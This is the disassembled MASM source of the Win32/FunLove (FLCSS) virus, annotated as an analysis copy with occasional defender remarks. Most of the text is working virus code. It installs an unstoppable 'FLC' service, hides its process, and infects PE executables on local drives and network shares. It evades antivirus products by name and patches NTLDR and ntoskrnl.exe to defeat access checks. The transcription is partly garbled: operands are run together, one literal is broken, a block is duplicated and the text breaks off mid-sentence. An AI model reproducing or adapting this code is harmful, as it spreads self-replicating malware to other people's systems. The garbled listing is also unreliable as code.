Funlove.4608的源代码
;*********************************************************************************************
;Flcss.asm
;
;disasm by Code Demon
;
;Code Demon Virus Dreaming Factory
;
;*********************************************************************************************
; ---------------------------------------------------------------------------------------------
; Annotated analysis copy of the published Win32/FunLove ("FLCSS") disassembly.
; Dialect: 32-bit MASM, Intel syntax, Win32 stdcall API, one USE32 segment that holds code,
; self-patched API thunks and data together.
; NOTE(review): this transcription has lost the whitespace between mnemonics/directives and
; their operands ("callGetDelta" = "call GetDelta"); numeric literals mostly lack the "h"
; suffix but appear to be hexadecimal (compare 5A4Dh / 0FFFFFFFBh where the suffix survived).
; Several symbols used below (SCM_Handle, c_*, i_*, p_*, o_*, m_*, v_*, r_*, w_*, DLL_Func,
; DLL_Base, CurrentDirEnd, DirEnd, SearchHandle, ThreadId, Service_Handle, EnumBuffer*,
; WNetStructAddr) are never defined in this listing - presumably stack-relative EQUates from
; an omitted part of the file. Code is reproduced exactly as published; defects and duplicated
; fragments are flagged in comments but deliberately not repaired.
; ---------------------------------------------------------------------------------------------
.586
ASSUMECS:CODE,DS:CODE; CS and DS both refer to the single CODE segment
CODESEGMENTUSE32; one 32-bit flat segment: code, thunks and data
VSizeequoffsetVEnd - VStart; byte length of the replicated body; the end label appears as "vend" below (MASM labels are case-insensitive unless OPTION CASEMAP:NONE) - TODO confirm
Phys_VSize equ1000; file space reserved for the body when appended to a host (0x1000 bytes)
main:
;*********************************************************************************************
; Entry from an infected host. InfectFile (below) overwrites the host's first 8 entry-point
; bytes with "90 90 65 E8 rel32" (nop; nop; gs: call VStart) and keeps the original bytes in
; HostCode. So on arrival: [esp] = host EP + 8, [esp+4] = the loader's return address inside
; KERNEL32 (used below to locate kernel32 without an import table).
;*********************************************************************************************
VStart:
callGetDelta; ebx = runtime address of VStart (call/pop delta); all data is addressed as [offset X + ebx]
leaesi,[offset HostCode + ebx]; the 8 original entry-point bytes saved at infection time
movedi,[esp]; return address = host EP + 8
subedi,08; back to the host entry point
mov[esp],edi; the final "ret" resumes at the restored host EP
movsd
movsd; restore the 8 host bytes in place (the EP section was flagged writable during infection)
pushdword ptr [esp + 04]; argument: the loader's return address, an address inside KERNEL32
callRelocKernel32; locate GetProcAddress and fill the KERNEL32 thunks
oreax,eax
jzshort Exit; could not resolve kernel32 - run the host untouched
cmpbyte ptr [offset OS + ebx],00; OS byte set by Whereis_GPA: 0 = Win9x, 1 = NT4, 2 = Win2K
jnzshort NT_Srv
callCreate9xProcess; Win9x: drop FLCSS.EXE into the system directory and spawn it
ret
NT_Srv:callCreateNTService; NT/2K: drop FLCSS.EXE and install/start it as the "FLC" service
Exit:ret; resume the host at its original entry point
;*********************************************************************************************
; NT/2K persistence: install FLCSS.EXE as the auto-start service "FLC".
; Falls back to infecting from inside the current host process if any step fails.
; Numeric literals without an "h" suffix read as hexadecimal in this transcription.
;*********************************************************************************************
CreateNTService:
callRelocAdvapi32; LoadLibrary ADVAPI32 and fill its thunks
oreax,eax
jzshort CNT_Failed
push02; dwDesiredAccess = 2 (SC_MANAGER_CREATE_SERVICE)
push00; lpDatabaseName = NULL
push00; lpMachineName = NULL (local SCM)
callOpenSCManagerA
oreax,eax
jzshort CNT_Failed; no SCM access (e.g. non-admin) -> infect from the host instead
movSCM_Handle,eax
callCreateExecutable; write FLCSS.EXE; returns 0 when the file cannot be (re)created,
oreax,eax; which the author treats as "already resident" -> just exit
jzshort CNT_Exit
movedi,0F01FF; SERVICE_ALL_ACCESS
leaesi,offset [Service + ebx]; "FLC"
pushedi
pushesi
pushSCM_Handle
callOpenServiceA; does the service already exist?
oreax,eax
jnzshort CNT_Run; yes -> just start it
xoreax,eax
pusheax; lpPassword = NULL
pusheax; lpServiceStartName = NULL (runs as LocalSystem)
pusheax; lpDependencies = NULL
pusheax; lpdwTagId = NULL
pusheax; lpLoadOrderGroup = NULL
leaeax,[offset Buffer1 + ebx]; lpBinaryPathName = "<system dir>\flcss.exe" built by CreateExecutable
pusheax
push01; dwErrorControl = SERVICE_ERROR_NORMAL
push02; dwStartType = SERVICE_AUTO_START (survives reboots)
push20; dwServiceType (0x20 = SERVICE_WIN32_SHARE_PROCESS if hex; ServiceDispatcher later reports 0x10)
pushedi; dwDesiredAccess = SERVICE_ALL_ACCESS
push00; lpDisplayName = NULL
pushesi; lpServiceName = "FLC"
pushSCM_Handle
callCreateServiceA
oreax,eax
jzshort CNT_Failed
CNT_Run:
push00; lpServiceArgVectors = NULL
push00; dwNumServiceArgs = 0
pusheax; hService
callStartServiceA; the service process (VService) then carries out the infection
oreax,eax
jnzshort CNT_Exit
CNT_Failed:
callStartInfectionThread; no service - spawn the infection thread inside this host process
CNT_Exit:
ret; the SCM and service handles are never closed
;*********************************************************************************************
; Win9x persistence: write FLCSS.EXE and launch it as a separate process.
; Falls back to infecting from inside the host if the process cannot be created.
;*********************************************************************************************
Create9xProcess:
; The dropped FLCSS.EXE is the component that keeps re-infecting after hosts are cleaned.
callCreateExecutable
oreax,eax
jzshort P9x_Exit; file could not be created (author treats this as "already running")
P9x_00:
xoreax,eax
leaedi,[offset Buffer2 + ebx]
pushedi; lpProcessInformation = Buffer2
pushedi; lpStartupInfo = Buffer2 as well (cb left 0; both structs share the zeroed buffer)
movecx,040
repzstosd; zero 0x40 dwords (256 bytes) of Buffer2
movcl,06
pusheax
loop$ - 1; "push eax" is one byte, so this pushes six zeros: lpCurrentDirectory, lpEnvironment,
; dwCreationFlags, bInheritHandles, lpThreadAttributes, lpProcessAttributes
leaesi,[offset Buffer1 + ebx]; full path of flcss.exe from CreateExecutable
pushesi; lpCommandLine
push00; lpApplicationName = NULL
callCreateProcessA; spawn FLCSS.EXE (its entry is presumably VService - TODO confirm)
oreax,eax
jnzshort P9x_Exit
P9x_Failed:
callStartInfectionThread; could not spawn - infect from this host process instead
P9x_Exit:
ret
;****************************************************************************
; Drop the standalone copy: <system dir>\flcss.exe (the file most often left behind after
; cleaning). Returns eax = 0 if the file could not be created/opened exclusively, else != 0.
;****************************************************************************
CreateExecutable:
leaedi,[offset Buffer1 + ebx]
pushedi; (argument for OpenFile below: o_Filename = Buffer1)
push104; nBufferLength = 0x104 (MAX_PATH)
pushedi; lpBuffer = Buffer1
callGetSystemDirectoryA; Buffer1 = system directory
addedi,eax; eax = length written
moval,'\'
stosb
leaesi,[offset Process + ebx]; 'flcss.exe',0
movsd
movsd
movsd; copies 12 bytes (the 10-byte name plus 2 bytes of the following "FLC"; the NUL is already in place)
push02; o_OpenMode = 2 (CREATE_ALWAYS)
callOpenFile; resets attributes, then CreateFileA with share mode 0
cmpeax,-1
jzshort CE_Exit; fails (sharing violation) while a running FLCSS.EXE holds the file -> "already resident"
movc_FileHandle,eax
leaedi,[offset VImports + ebx]; reset the embedded import descriptor before writing it out
moveax,-1
stosd
stosd; first two dwords of VImports := -1
leaedi,[offset Kernel32_Relocated + ebx]; the IAT slot the loader overwrote with Beep's address
moveax,[edi - 8]
stosd; Kernel32_Relocated := dword at Kernel32_Relocated-8 (as listed that is the zero terminator;
; NOTE(review): probably meant to restore the by-name thunk - TODO confirm against the binary)
push00; lpOverlapped = NULL
leaesi,c_BytesWritten
pushesi; lpNumberOfBytesWritten
push0200; 0x200 bytes
pushebx; from VStart
pushc_FileHandle
callWriteFile; "header": first 0x200 bytes of the body as listed (NOTE(review): no PE header is
; visible at VStart in this listing - TODO confirm how the dropper's MZ/PE header is formed)
push00
pushesi
push1000; 0x1000 bytes
pushebx
pushc_FileHandle
callWriteFile; body -> file size 0x200 + 0x1000 = 4608 bytes (hence "Funlove.4608")
pushc_FileHandle
callCloseHandle
CE_Exit:
inceax; -1 -> 0 on failure; handle+1 (non-zero) on success
ret; as listed, the two arguments pushed for OpenFile are not popped
;************************************************************************************
; Service-side entry: the code FLCSS.EXE runs (presumably its PE entry point - TODO confirm).
; NT/2K: hand control to the SCM dispatcher ("FLC" -> ServiceDispatcher).
; Win9x (and NT when the dispatcher returns - there is no jump after that call): register a
; window class, hide the process from the Ctrl+Alt+Del list, then start the infection thread.
;************************************************************************************
VService:
callGetDelta; ebx = runtime address of VStart
pushdword ptr [esp]; loader's return address (inside KERNEL32) -> used to find GetProcAddress
callRelocKernel32
oreax,eax
jzVS_Exit
cmpbyte ptr [offset OS + ebx],00; 0 = Win9x
jzshort W9x_Service_Register
WNT_Service_Hacknowledge:
callRelocAdvapi32; resolve ADVAPI32 thunks
oreax,eax
jzVS_Exit
leaesi,[offset Buffer1 + ebx]; SERVICE_TABLE_ENTRY[2] built in Buffer1
xoreax,eax
leaecx,[offset Service + ebx]; "FLC"
leaedx,[offset ServiceDispatcher + ebx]; ServiceMain
mov[esi],ecx
mov[esi + 04],edx
mov[esi + 08],eax
mov[esi + 0C],eax; NULL,NULL terminator
pushesi
callStartServiceCtrlDispatcherA; blocks while the service runs; falls through on return or failure
W9x_Service_Register:
leaesi,[offset USER32_Name + ebx]
pushesi
callLoadLibraryA; USER32.dll
leaesi,[offset RegisterClassA+ ebx]
pushesi
pusheax
callGetProcAddress; resolve RegisterClassA by name
oreax,eax
jzshort VS_00
mov[esi - 06],eax; patch the thunk's "mov eax,imm32" (NOTE(review): this assumes the label sits on
; the name string, 7 bytes after the B8 byte; the labels as listed sit on the B8 byte)
leaesi,[offset Buffer1 + ebx]; WNDCLASSA in Buffer1
movedi,esi
xoreax,eax
movecx,0A
repzstosd; zero 10 dwords (40 bytes)
movdword ptr [esi + 04],-1; lpfnWndProc = -1 (not a callable address; purpose not evident - TODO)
movdword ptr [esi + 10],400000; hInstance = 0x400000 (default Win9x image base)
leaeax,[offset Service + ebx]
mov[esi + 24],eax; lpszClassName = "FLC"
pushesi
callRegisterClassA; registers window class "FLC" (original comment calls this "very important";
; it may act as an already-running marker - TODO confirm)
leaesi,[offset RegisterServiceProcess+ ebx]
pushesi
pushdword ptr [offset Kernel32_Base + ebx]
callGetProcAddress; RegisterServiceProcess exists only on Win9x; on NT this yields 0 -> VS_00
oreax,eax
jzshort VS_00
mov[esi - 06],eax; patch the thunk (same label caveat as above)
callGetCurrentProcessId
; (the call is duplicated in the listing - harmless)
callGetCurrentProcessId
; RegisterServiceProcess(pid, RSP_SIMPLE_SERVICE=1): hides the process from the
push01; Win9x Ctrl+Alt+Del task list
pusheax
callRegisterServiceProcess
push8000; Sleep(0x8000 ms)
callSleep
VS_00:
callStartInfectionThread; worker thread: VThread
VS_Exit:
ret
;*********************************************************************************************
; ServiceMain for "FLC" (NT/2K). Reports RUNNING to the SCM, waits, starts the infection thread
; and returns; the control handler ignores every request, so the service cannot be stopped
; cleanly (the original comment notes an error is shown when an administrator tries).
;*********************************************************************************************
ServiceDispatcher:
callGetDelta
leaesi,[offset ServiceHandler + ebx]
leaedi,[offset Service + ebx]; "FLC"
pushesi; lpHandlerProc
pushedi; lpServiceName
callRegisterServiceCtrlHandlerA
movService_Handle,eax
leaesi,[offset Buffer1 + ebx]; SERVICE_STATUS in Buffer1
movedi,esi
movecx,06
xoreax,eax
repzstosd; zero 6 dwords (SERVICE_STATUS has 7; dwWaitHint is left as-is)
movdword ptr [esi],10; dwServiceType = 0x10 (SERVICE_WIN32_OWN_PROCESS)
movdword ptr [esi + 04],04; dwCurrentState = 4 (SERVICE_RUNNING)
movdword ptr [esi + 08],07; dwControlsAccepted = STOP|PAUSE_CONTINUE|SHUTDOWN (accepted, but ignored)
pushesi
pushService_Handle; tell the SCM the service is running
callSetServiceStatus
push8000; Sleep(0x8000 ms)
callSleep
callStartInfectionThread; spawn VThread, then leave ServiceMain (the thread keeps running)
ret
ServiceHandler:
ret; control handler does nothing (plain "ret", the dwControl argument is not popped).
; Defender note: "net stop FLC" will not terminate it; terminate the process instead.
;*********************************************************************************************
; Seed the PRNG and start the worker thread (VThread) in the current process.
;*********************************************************************************************
StartInfectionThread:
callGetTickCount
mov[offset Rand + ebx],eax; Rand := tick count (seed for GetRand)
leaeax,ThreadId
pusheax; lpThreadId
push0; dwCreationFlags = 0 (run immediately)
push0; lpParameter = NULL
leaeax,[offset VThread + ebx]
pusheax; lpStartAddress = VThread
push0; dwStackSize = 0 (default)
push0; lpThreadAttributes = NULL
callCreateThread; the thread handle in eax is never closed
ret
;*********************************************************************************************
; Worker loop (never exits): sweep local drives, sleep, and with probability 1/32 per
; iteration also sweep the network neighbourhood.
;*********************************************************************************************
VThread:
callGetDelta
callInfectDrives; local fixed + mapped network drives
push60000; sleep interval (0x60000 ms ~ 6.5 min if hex; 60 s if decimal - radix lost in listing)
callSleep
callGetRand
andal,1F; low 5 bits of the PRNG output
jnzshort VThread; 31/32: back to the local sweep
callInfectNetwork; 1/32: enumerate and infect reachable network shares
jmpshort VThread
;********************************************************************************
; Network spread: load MPR.dll, resolve the WNet* thunks, then walk the whole
; network resource tree starting from the root (NULL NETRESOURCE).
;********************************************************************************
InfectNetwork:
leaeax,[offset MPR_Name + ebx]; "MPR.dll"
pusheax
callLoadLibraryA
oreax,eax
jzshort INet_Failed
pusheax; DLL_Base = hMPR
leaesi,[offset MPR_Functions + ebx]
pushesi; DLL_Func = thunk table (WNetOpenEnumA / WNetEnumResourceA / WNetCloseEnum)
callDLL_Relocate
oreax,eax
jzshort INet_Failed
push00; lpNetResource = NULL -> enumerate from the top of the network
callNetSearch
INet_Failed:
ret
;*********************************************************************************************
; Local sweep: for every drive letter from the start letter up to 'Z' that is a fixed disk
; or a network drive, patch NTLDR/ntoskrnl on it (BlownAway) and recurse over its files.
;*********************************************************************************************
InfectDrives:
pushesi
callGetTickCount
mov[offset Tick + ebx],eax; start of the throttle window used by Wait_A_Little
leaesi,[offset Buffer1 + ebx]
movdword ptr [esi],' \:+ ebx - offset VStart'; NOTE(review): literal garbled in this transcription;
; presumably the dword ' \:C', i.e. the bytes "C:\ " (start at drive C) - TODO confirm
ID_TestDrive:
movbyte ptr [esi + 03],00; Buffer1 = "X:\",0
pushesi
callGetDriveTypeA
cmpal,03; DRIVE_FIXED
jzshort ID_DriveOk
cmpal,04; DRIVE_REMOTE (mapped network drive)
jnzshort ID_Invalid
ID_DriveOk:
addesi,03; esi -> end of "X:\" (passed as DirEnd / CurrentDirEnd)
pushesi
callBlownAway; try to patch NTLDR and \WINNT\System32\ntoskrnl.exe on this drive
pushesi
callFileSearch; recursive file sweep from the root
subesi,03
ID_Invalid:
moval,[offset Buffer1 + ebx]
incal; next drive letter
mov[offset Buffer1 + ebx],al
cmpal,'Z'
jnashort ID_TestDrive; loop while the letter is <= 'Z'
popesi
ret
;*********************************************************************************************
; Recursive WNet enumeration. For every resource with a remote name: append "\" to it in
; Buffer1 and run BlownAway + FileSearch against the share; recurse into containers.
; Numeric literals read as hex. EnumBuffer* / WNetStructAddr are not defined in this listing.
;*********************************************************************************************
NetSearch :
movEnumBufferSize,4000; 0x4000-byte enumeration buffer
orEnumNB_Objects,-1; cCount = -1 (as many entries as fit)
leaeax,WNetStructAddr
pusheax; lphEnum (the handle overwrites the same slot)
pushWNetStructAddr; lpNetResource (NULL for the root, else the parent NETRESOURCE*)
push0; dwUsage = 0
push0; dwType = RESOURCETYPE_ANY
push2; dwScope = 2 (RESOURCE_GLOBALNET)
callWNetOpenEnumA
oreax,eax
jnzNET_Close; on failure still calls WNetCloseEnum with whatever the slot holds
push04; PAGE_READWRITE
push1000; MEM_COMMIT
push4000; 0x4000 bytes
push00
callVirtualAlloc
oreax,eax
jzshort NET_Close
movEnumBufferAddr,eax
NET_00:
movesi,EnumBufferAddr
leaeax,EnumBufferSize
pusheax; lpBufferSize
pushesi; lpBuffer
leaeax,EnumNB_Objects
pusheax; lpcCount
pushWNetStructAddr; hEnum
callWNetEnumResourceA
oreax,eax
jnzshort NET_Free; ERROR_NO_MORE_ITEMS or failure -> done with this level
movecx,EnumNB_Objects
orecx,ecx
jzshort NET_00
NET_01:; for each NETRESOURCE (0x20 bytes)
pushecx
pushesi
movesi,[esi + 14]; lpRemoteName
oresi,esi
jzshort NET_03
cmpword ptr [esi],0041; remote name "A" + NUL is skipped (original comment: floppy?) - TODO confirm
jzshort NET_03
leaedi,[offset Buffer1 + ebx]
NET_02:
movsb
cmpbyte ptr [esi],00
jnzshort NET_02; copy the remote name (no length check against Buffer1's 0x200 bytes)
moval,'\'
stosb; Buffer1 = "\\server\share\"
pushedi; DirEnd
callBlownAway; try to patch NTLDR / ntoskrnl.exe through the share
pushedi; CurrentDirEnd
callFileSearch; infect every .exe/.scr/.ocx reachable through the share
NET_03:
popesi
moveax,[esi + 0C]; dwUsage
andal,2
cmpal,2; RESOURCEUSAGE_CONTAINER?
jnzshort NET_04
pushesi
callNetSearch; recurse into the container (recursion depth unbounded)
NET_04:
addesi,20; next NETRESOURCE
popecx
loopNET_01
jmpshort NET_00
NET_Free:
push8000; MEM_RELEASE
push00
pushEnumBufferAddr
callVirtualFree
NET_Close:
pushWNetStructAddr
callWNetCloseEnum
ret
;*************************************************************************************
; Recursive directory walk. Buffer1 holds the current path (ending in "\"), CurrentDirEnd
; points just past it. Files are handed to FileTest; subdirectories not starting with "."
; are appended to the path and walked. Buffer2 = WIN32_FIND_DATAA.
; (The original comment says the author would rather hook IFS for full stealth.)
;*************************************************************************************
FileSearch:
moveax,CurrentDirEnd
movdword ptr [eax],002A2E2A; append "*.*",0
leaedi,[offset Buffer2 + ebx]; lpFindFileData
leaesi,[offset Buffer1 + ebx]; lpFileName = "<path>\*.*"
pushedi
pushesi
callFindFirstFileA
cmpeax,-1
jzshort RS_Exit
RS_00:
movSearchHandle,eax; NOTE(review): if SearchHandle is one global slot, the recursive call below overwrites it - TODO confirm
RS_01:
testbyte ptr [edi],10; dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY?
jzshort FileTest; a file: FileTest filters/infects it and jumps back to RS_Next
RS_Directory:
cmpbyte ptr [edi + 2C],'.'; cFileName starts with "." (".", "..") -> skip
jzshort RS_Next
movesi,edi
addesi,2C; cFileName
movedi,CurrentDirEnd
RSD_00:
movsb
cmpbyte ptr [esi],0
jnzshort RSD_00; append the directory name (no bound against Buffer1's 0x200 bytes)
moval,'\'
stosb
pushedi; new CurrentDirEnd
callFileSearch; recurse (depth unbounded)
RS_Next:
leaedi,[offset Buffer2 + ebx]
pushedi
pushSearchHandle
callFindNextFileA
oreax,eax
jnzshort RS_01
pushSearchHand
; NOTE(review): the lines from "pushSearchHand" through the second "RS_Next:" are a duplicated
; fragment of the transcription - the label is defined twice, so this listing does not
; assemble as-is. Left unchanged.
RS_Next:
leaedi,[offset Buffer2 + ebx]
pushedi
pushSearchHandle
callFindNextFileA
oreax,eax
jnzshort RS_01
pushSearchHandle
callFindClose
RS_Exit:
ret
;********************************************************************
; Per-file filter (continuation of FileSearch; leaves via jmp RS_Next).
; Skips files whose first 4 name characters hash to one of 12 reserved names (anti-virus
; products and a few system files), keeps only .exe/.scr/.ocx, requires size >= 0x2000 and
; rejects files already carrying the infection marker (size low byte == 3).
;********************************************************************
FileTest:
movedx,[edi + 2C]; first 4 bytes of cFileName
oredx,20202020; force lower case
xoredx,61F81F61; obfuscated compare key (e.g. "aler" -> 139D7300h)
leaesi,[offset SkipNames + ebx]; 12 hashed prefixes that are never infected
movecx,0C
FT_00:
lodsd
cmpedx,eax
jzshort FT_Exit
loopFT_00
;************************************************************************
; Extension check: esi ends one past the NUL, so [esi-4] = "ext",0 and OR 20202020h turns it
; into the MASM dword constant ' ext'.
;************************************************************************
movesi,edi
addesi,2C
FT_01:
lodsb
oral,al
jnzshort FT_01
moveax,[esi - 4]; last 3 characters + NUL
oreax,20202020
cmpeax,' xco'; .ocx (ActiveX control)
jzshort FT_02
cmpeax,' rcs'; .scr (screen saver)
jzshort FT_02
cmpeax,' exe'; .exe
jnzshort FT_Exit
FT_02:
moveax,[edi + 20]; nFileSizeLow
cmpeax,2000; files smaller than 0x2000 bytes are left alone
jcshort FT_Exit
cmpal,03; size ends in ...03 -> infection marker (InfectFile adds 3 to a 0x1000-rounded size)
jzshort FT_Exit
leaesi,[offset Buffer1 + ebx]; build the full path in Buffer3: directory part ...
leaedi,[offset Buffer3 + ebx]
pushedi; i_Filename
movecx,CurrentDirEnd
subecx,esi
repzmovsb
leaesi,[offset Buffer2 + ebx]
addesi,2C; ... plus cFileName including its NUL
FT_03:
movsb
cmpbyte ptr [esi - 1],0
jnzshort FT_03
callInfectFile
FT_Exit:
jmpRS_Next; back into FileSearch's FindNextFile loop
;*****************************************************************************************
; Infect one PE file (i_Filename = Buffer3). Strategy: enlarge the last section, append the
; body there, make that section RWX, make the entry-point section writable, save the 8
; bytes at the entry point into HostCode and replace them with a call to the body, then
; restore the original timestamps. Offsets are IMAGE_DOS_HEADER / IMAGE_NT_HEADERS32 /
; IMAGE_SECTION_HEADER fields; the i_* symbols are not defined in this listing.
;*****************************************************************************************
InfectFile:
pushi_Filename
push03; OPEN_EXISTING
callOpenFile
cmpeax,-1
jzIN_Exit
movi_FileHandle,eax
push00
pusheax
callGetFileSize; original size (also decides where the body goes)
movi_FileSize,eax
cmpal,03; infection marker present?
jzIN_Exit; NOTE: leaves without closing i_FileHandle (handle leak on this path)
leaedi,[offset Buffer3 + ebx]; read the first 0x2000 bytes (headers) over the filename buffer
push00
leaesi,i_BytesRead
pushesi
push2000
pushedi
pushi_FileHandle
callReadFile
;*********************************************************************************
; Header validation (IMAGE_DOS_HEADER / IMAGE_NT_HEADERS32 layouts)
;*********************************************************************************
cmpword ptr [edi],5A4Dh; e_magic == "MZ"
jnzIN_CloseFile
cmpword ptr [edi + 18],0040; e_lfarlc == 0x40 (new-format header; < 0x40 means plain DOS)
jnzIN_CloseFile
cmpdword ptr [edi + 3C],1C00; e_lfanew must lie inside the 0x2000 bytes read
jaIN_CloseFile
addedi,[edi + 3C]; edi -> IMAGE_NT_HEADERS (or an NE header)
moveax,[edi]
cmpeax,00004550; "PE",0,0 ?
jnzIN_CloseFile; needed because Win3.x NE files also have e_lfarlc >= 0x40
cmpword ptr [edi + 5C],2; OptionalHeader.Subsystem == IMAGE_SUBSYSTEM_WINDOWS_GUI only
jnzIN_CloseFile
movesi,edi
addesi,18; + signature + sizeof(IMAGE_FILE_HEADER)
addsi,[edi + 14]; + SizeOfOptionalHeader -> first IMAGE_SECTION_HEADER (16-bit add)
pushesi
moveax,[edi + 28]; AddressOfEntryPoint
IN_00:; find the section that contains the entry point
movecx,[esi + 0C]; VirtualAddress
addecx,[esi + 08]; + VirtualSize
cmpeax,ecx
jcshort IN_01
addesi,28; next section header (no check against NumberOfSections)
jmpshort IN_00
IN_01:
subeax,[esi + 0C]
addeax,[esi + 14]; raw offset of the EP = EP - VirtualAddress + PointerToRawData
movi_EP_Offset,eax
or[esi + 24],80000000; Characteristics |= IMAGE_SCN_MEM_WRITE, so VStart can restore HostCode
; in place at run time (original note: unlike DOS, Windows code pages are
; read-only unless the section says otherwise)
popesi
xorecx,ecx
movcx,[edi + 06]; NumberOfSections
dececx
moveax,ecx
movedx,28
muledx
addesi,eax; esi -> last section header
moveax,[esi + 24]; Characteristics
cmpal,80; low byte 0x80 = IMAGE_SCN_CNT_UNINITIALIZED_DATA -> cannot carry code, skip
jzIN_CloseFile
oreax,8C000000; |= MEM_WRITE | MEM_READ | MEM_EXECUTE
andeax,not 12000000; &= ~(MEM_SHARED | MEM_DISCARDABLE)
mov[esi + 24],eax
movecx,i_FileSize; overlay heuristic (the original comment relates it to SFX archives):
movedx,ecx
moveax,ecx
clc
shreax,03
subedx,eax; edx = 7/8 * FileSize
subedx,[esi + 14]; - PointerToRawData(last)
jcshort IN_02
subedx,[esi + 10]; - SizeOfRawData(last)
jncIN_CloseFile; last section ends before 7/8 of the file (large overlay) -> skip
IN_02:; new size of the last section = max(VirtualSize, FileSize - PointerToRawData), page-rounded
movedx,[esi + 08]; VirtualSize
subecx,[esi + 14]; ecx = FileSize - PointerToRawData
jcshort IN_03
cmpedx,ecx
jashort IN_03
movedx,ecx
IN_03:
testedx,00000FFF
jzshort IN_04
andedx,0FFFFF000
addedx,1000; round up to 0x1000
IN_04:
movecx,edx
addecx,[esi + 0C]; ecx = VA where the body will start
moveax,ecx
addeax,4000
mov[edi + 50],eax; SizeOfImage = body VA + 0x4000
subecx,[edi + 28]; body VA - EP
addecx,offset VStart - 100 - 08; rel32 for the "call" placed at EP+3 (next insn at EP+8);
; the "offset VStart - 100" term suggests VStart sits 0x100 into the segment - TODO confirm
movi_HostDep32,ecx
moveax,edx
addeax,4000
mov[esi + 08],eax; VirtualSize = rounded + 0x4000
moveax,edx
addeax,[esi + 14]
movi_VirusOffset,eax; raw file offset where the body is written
addedx,1000
mov[esi + 10],edx; SizeOfRawData = rounded + 0x1000
addedx,[esi + 14]
addedx,03; new file size = PointerToRawData + rounded + 0x1000 + 3 (the +3 is the marker)
pushi_FileHandle
pushedx
callMapFile; CreateFileMapping of the enlarged size (this grows the file)
oreax,eax
jzshort IN_CloseFile
movi_MapHandle,eax
pusheax
callViewMap; MapViewOfFile (write)
oreax,eax
jzshort IN_CloseMap
movedx,eax; edx = view base
leaesi,[offset Buffer3 + ebx]; write back the modified 0x2000-byte header
movedi,edx
movecx,2000
repzmovsb
leaedi,[offset HostCode + ebx]
movesi,i_EP_Offset
addesi,edx
movsd
movsd; save the 8 original bytes at the entry point
movedi,esi; replace them with: 90 90 65 E8 rel32 (nop; nop; gs: call <body>)
subedi,08
moveax,00E8659090
stosd
moveax,i_HostDep32
stosd
movedi,edx
moveax,i_FileSize
movecx,i_VirusOffset
subecx,eax
jnashort IN_05; body offset <= old size: nothing to pad
addedi,eax
xoral,al
repzstosb; zero-fill the gap between the old end of file and the body
IN_05:
movesi,ebx; copy the body (VSize bytes starting at VStart in memory) ...
movedi,edx
addedi,i_VirusOffset
movecx,VSize
repzmovsb
movecx,Phys_VSize - VSize + 3
repzstosb; ... and zero the rest of the reserved 0x1000 bytes (+3)
pushedx
callUnmapViewOfFile
IN_CloseMap:
pushi_MapHandle
callCloseHandle
callWait_A_Little; throttle disk activity between infections
IN_CloseFile:
leaesi,[offset Buffer2 + 14 + ebx]; restore timestamps from the WIN32_FIND_DATA in Buffer2:
pushesi; lpLastWriteTime (+0x14)
subesi,08
pushesi; lpLastAccessTime (+0x0C)
subesi,08
pushesi; lpCreationTime (+0x04)
pushi_FileHandle
callSetFileTime; Defender note: timestamps are preserved, so mtime does not reveal infection;
; the size marker (low byte 3) and the "90 90 65 E8" entry stub do
pushi_FileHandle
callCloseHandle
IN_Exit:
ret
;********************************************************************************
; Locate GetProcAddress without an import table. Input w_Kernel32 = an address inside
; KERNEL32 (the loader's return address). Its high 12 bits select a hard-coded kernel32
; base for Win9x / NT4 / Win2K; 0x20000 bytes from there are scanned for an 8-byte code
; signature whose +3 is GetProcAddress's entry. Sets OS (0/1/2) and Kernel32_Base and
; patches the GetProcAddress thunk. Returns eax = base or 0. Fragile by design: any other
; kernel32 build (service pack, later Windows) fails the match or faults on an unmapped page.
;********************************************************************************
Whereis_GPA:
leaesi,[offset GPA_Sigs + ebx]; 3 signatures, 8 bytes each, in OS order
movbyte ptr [offset OS + ebx],00
moveax,w_Kernel32
andeax,0FFF00000
cmpeax,0BFF00000; 0xBFFxxxxx -> Win9x kernel32
jnzshort OS_WinNT?
OS_Win9x:
movedi,0BFF70000; Win9x kernel32 base
jmpshort WG_00
OS_WinNT?:
incbyte ptr [offset OS + ebx]; OS = 1
addesi,08; NT4 signature
cmpeax,077F00000; 0x77Fxxxxx -> NT4
jnzshort OS_Win2K?
movedi,eax; base = 0x77F00000
jmpshort WG_00
OS_Win2K?:
incbyte ptr [offset OS + ebx]; OS = 2
addesi,08; Win2K signature
cmpeax,077E00000; 0x77Exxxxx -> Win2K
jnzshort WG_Failed; anything else is unsupported
movedi,077E80000; Win2K kernel32 base
WG_00:
movedx,edi; remember the base
movecx,20000; scan length
WG_01:
pushecx
movecx,08
pushesi
pushedi
repzcmpsb; compare the 8 signature bytes at edi
popedi
popesi
popecx
jzshort WG_02
incedi
loopWG_01; byte-by-byte scan, no page-presence check
WG_Failed:
xoreax,eax
jmpshort WG_03
WG_02:
addedi,03; GetProcAddress entry = match + 3
mov[offset GetProcAddress + 1 + ebx],edi; patch the imm32 of the thunk's "mov eax,imm32"
moveax,edx
mov[offset Kernel32_Base + ebx],eax; module handle later passed to GetProcAddress
WG_03:
ret
;***************************************************************************************
; Fill a thunk table. Each entry is "B8 imm32 FF E0 'Name',0" (mov eax,imm32 / jmp eax):
; DLL_Func = first thunk, DLL_Base = module handle. Writes each resolved address into the
; imm32 and continues while the byte after the name is B8h. Stops at the first lookup
; failure (eax = 0; later thunks stay unresolved). Self-modifying: the table must be writable.
;***************************************************************************************
DLL_Relocate:
movesi,DLL_Func
DR_00:
moveax,esi
addeax,07; the name string follows the 7-byte thunk
pusheax
pushDLL_Base
callGetProcAddress
oreax,eax
jzshort DR_03
DR_01:
mov[esi + 1],eax; imm32 := resolved address
addesi,07
DR_02:
lodsb
oral,al
jnzshort DR_02; skip the name
cmpbyte ptr [esi],0B8; another thunk follows?
jzshort DR_00
DR_03:
ret
;**********************************************************************************************
; "BlownAway": patch two NT system files on the drive/share whose path ends at DirEnd.
; (1) <root>\NTLDR: 5-byte pattern, turns "jz short +7" (74 07) into "jmp short +7" (EB 07)
;     after "cmp eax,[esi+58h]" (NT4) / "cmp eax,[edi+58h]" (2K).
; (2) <root>\WINNT\System32\ntoskrnl.exe: 9-byte pattern, replaces "mov al,bl" (NT4) /
;     "mov al,[ebp+14h]" (2K) just before "pop edi/esi/ebx/ebp ; ret 28h" with "mov al,1",
;     i.e. the patched kernel routine always returns TRUE.
; The decodes follow from the bytes in NT4_NTLDR / W2K_NTLDR / NT4_NTOSKRNL / W2K_NTOSKRNL;
; which kernel routine this is cannot be seen here (public analyses name SeAccessCheck, with
